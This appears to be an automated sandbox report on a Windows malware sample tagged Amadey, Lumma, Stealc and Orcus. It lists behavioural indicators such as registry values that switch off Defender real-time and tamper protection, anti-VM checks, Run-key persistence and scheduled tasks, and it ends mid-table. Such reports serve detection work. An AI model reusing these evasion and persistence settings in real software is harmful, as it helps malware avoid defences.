Malware Analysis Report

2025-01-22 15:02

Sample ID 241206-gpbj8atjhz
Target f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe
SHA256 f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813
Tags
amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813

Threat Level: Known bad

The file f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe was found to be: Known bad.

Malicious Activity Summary

GCleaner

Modifies Windows Defender Real-time Protection settings

Lumma family

Gcleaner family

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Lumma Stealer, LummaC

Orcus family

Amadey family

Orcus

Stealc

Stealc family

Orcurs Rat Executable

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Identifies Wine through registry keys

Executes dropped EXE

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Windows security modification

Checks installed software on the system

Adds Run key to start application

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Unsigned PE

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Kills process with taskkill

Runs net.exe

Checks processor information in registry

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 05:58

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 05:58

Reported

2024-12-06 06:00

Platform

win7-20241023-en

Max time kernel

119s

Max time network

120s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2380 created 1208 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\6c9611a3b9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012622001\\6c9611a3b9.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\9eb85c1ad3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012619001\\9eb85c1ad3.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\992d57873c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012620001\\992d57873c.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\916674a606.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012621001\\916674a606.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
